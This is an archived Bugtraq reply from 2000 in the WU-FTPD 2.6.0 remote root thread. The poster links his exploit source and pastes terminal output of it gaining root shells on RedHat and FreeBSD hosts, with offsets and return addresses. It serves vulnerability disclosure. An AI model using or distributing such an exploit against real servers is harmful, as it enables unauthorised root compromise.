Bugtraq mailing list archives
Re: WuFTPD: Providing *remote* root since at least1994
From: venglin () FREEBSD LUBLIN PL (Przemyslaw Frasunek)
Date: Sat, 1 Jul 2000 17:12:35 +0200
Has anyone come out with a working version of this exploit script. Both versions provided on the securityfocus.com web site, and or the one
distributed
here by TF8 is not working, even after I fixed his code. Do we know for sure the thing even exists.. I dunno, can anyone direct me to the actual code, because I have yet to see a working version of it that doesn't CORE dump.
sure? both, tf8's and mine (http://v.freebsd.lublin.pl/sources/bobek.c), works on my redhat and bsd boxes: lubi:venglin:~> ./b -t 4 pedagog Selected platform: RedHat Linux 6.2 with WUFTPD 2.6.0-RPM Connected to pedagog. Trying to log in. Logged in as ftp. Checking vulnerability. Ok, trying to find offset (initial: 1024) at offset 1024 at offset 1032 at offset 1040 at offset 1048 at offset 1056 at offset 1064 at offset 1072 at offset 1080 at offset 1088 at offset 1096 RET: 0x80759e0, RET location: 0xbfffcf74, RET location offset on stack: 1100 Reply size: 289, New RET: 0x80758bf Wait 10-20 seconds for reply. Enjoy your shell. [...] 0000000000000000000000000000000 Linux pedagog.xxx.xxx.xx 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown / uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp) another exaple: lubi:venglin:~> ./b localhost Selected platform: FreeBSD 3.4-STABLE with WUFTPD 2.6.0-ports Connected to localhost. Trying to log in. Logged in as ftp. Checking vulnerability. Ok, trying to find offset (initial: 1024) at offset 1024 at offset 1032 at offset 1040 at offset 1048 at offset 1056 at offset 1064 at offset 1072 RET: 0x80b1f10, RET location: 0xbfbfcc04, RET location offset on stack: 1076 Reply size: 527, New RET: 0x80b1d01 Wait 10-20 seconds for reply. Enjoy your shell. [...] 00000000000000000000000000000000000000000000000000000000000000 FreeBSD lubi.xxx.xxx.xx 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar 1 11:18:54 CET 2000 venglin () lubi xxx xxx xx:/mnt/elite/usr/src/sys/compile/GADACZKA i386 / uid=0(root) gid=0(wheel) egid=5(operator) groups=5(operator) -- * Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE * * Inet: venglin () freebsd lublin pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
Current thread:
- Re: remote crash BitchX 1.0c16, (continued)
- Re: remote crash BitchX 1.0c16 Moniz, Troy (Jul 05)
- Oracle Web Listener for AIX DoS Peter Grundl (Jul 04)
- Remote DoS Attack in LocalWEB HTTP Server 1.2.0 Vulnerability Ussr Labs (Jul 04)
- Recovering Passwords in Visible Systems' Razor Clifford, Shawn A (Jul 05)
- proftp advisory lamagra (Jul 05)
- Re: proftp advisory Max Vision (Jul 05)
- Re: proftp advisory Daniel Jacobowitz (Jul 05)
- Secure IRC Fabio Pietrosanti (Jul 06)
- Re: WuFTPD: Providing *remote* root since at least1994 Sebastian (Jul 01)
- Re: WuFTPD: Providing *remote* root since at least1994 Lamagra Argamal (Jul 01)
- Re: WuFTPD: Providing *remote* root since at least1994 Przemyslaw Frasunek (Jul 01)
- Re: WuFTPD: Providing *remote* root since at least1994 Vitaliy Andrusevich (Jul 04)